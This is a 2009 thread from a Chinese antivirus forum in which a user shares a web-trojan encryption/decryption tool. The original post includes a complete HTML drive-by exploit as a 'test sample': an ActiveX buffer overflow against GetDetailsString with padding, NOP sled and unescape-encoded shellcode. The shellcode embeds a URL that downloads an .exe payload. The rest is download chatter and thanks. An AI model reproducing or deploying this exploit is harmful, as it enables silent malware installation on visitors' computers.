查看: 5823|回复: 19
收起左侧

[未鉴定] 首发 unescape解密工具,解密现在比较流行的加密方法!

[复制链接]
老道
发表于 2009-9-2 14:14:06 | 显示全部楼层 |阅读模式
大家帮忙测试下,刚刚搞完的,没什么技术含量。只是为了方便才写成了工具。





再来个让大家测试的网马
<html>
<OBJECT id="target" classid="clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C">
</OBJECT>
<script>
function poc() {
var shellcode = unescape(
"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41" +
"%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875" +
"%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b" +
"%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e" +
"%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a" +
"%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b" +
"%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b" +
"%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450" +
"%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770" +
"%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650" +
"%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a" +
"%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163" +
"%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c" +
"%u7468%u7074%u2F3A%u772F%u7777%u622E%u6961%u7564%u632E%u6D6F%u6D2F%u6D75%u3161%u652E%u6578");//本行网马地址
var buff= "";
var nsp = unescape("%u06EB%u9090");
var sh = unescape("%u6950%u74C9");
var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");
for (i=0;i<1638;i++)  buff=buff + unescape("%u4141");
buff = buff + nsp + sh + nop + shellcode;
target.GetDetailsString(buff,1);
}
</script>
</html>

工具下载地址
下面的附件我没权限修改!上面的下载地址 已经修改了  %u0000 中断,加密字符长度为积数的时候加密结果有误的问题!

[ 本帖最后由 老道 于 2009-9-8 13:18 编辑 ]

网马加解密工具.rar

571.87 KB, 下载次数: 264

评分

参与人数 1人气 +1 收起 理由
gtyre1 + 1 帮上传了,支持原创~

查看全部评分

hu3167343
发表于 2009-9-2 14:16:59 | 显示全部楼层
支持LZ
hu3167343
发表于 2009-9-2 14:17:58 | 显示全部楼层
貌似下载不了
asinasina
发表于 2009-9-2 14:22:10 | 显示全部楼层
下载了,准备试试
老道
 楼主| 发表于 2009-9-2 14:22:17 | 显示全部楼层
论坛我没权限上传大附件!没办法哦!我找个网络硬盘去
hu3167343
发表于 2009-9-2 14:25:35 | 显示全部楼层

回复 4楼 asinasina 的帖子

乃怎么下载的,我好奇
老道
 楼主| 发表于 2009-9-2 14:28:25 | 显示全部楼层
原帖由 hu3167343 于 2009-9-2 14:25 发表
乃怎么下载的,我好奇


工具下载地址2  打开连接后  点击“下载” 就行了!

未命名.JPG

[ 本帖最后由 老道 于 2009-9-2 14:29 编辑 ]
asinasina
发表于 2009-9-2 14:36:13 | 显示全部楼层
我帮忙上传下啦

网马加解密工具.rar

571.87 KB, 下载次数: 209

老道
 楼主| 发表于 2009-9-2 14:38:41 | 显示全部楼层
你权限真高,羡慕!
taoyuan237
发表于 2009-9-2 21:36:22 | 显示全部楼层
对于密匙怎么样呢?
不过支持原创啦
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-18 06:50 , Processed in 0.145406 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表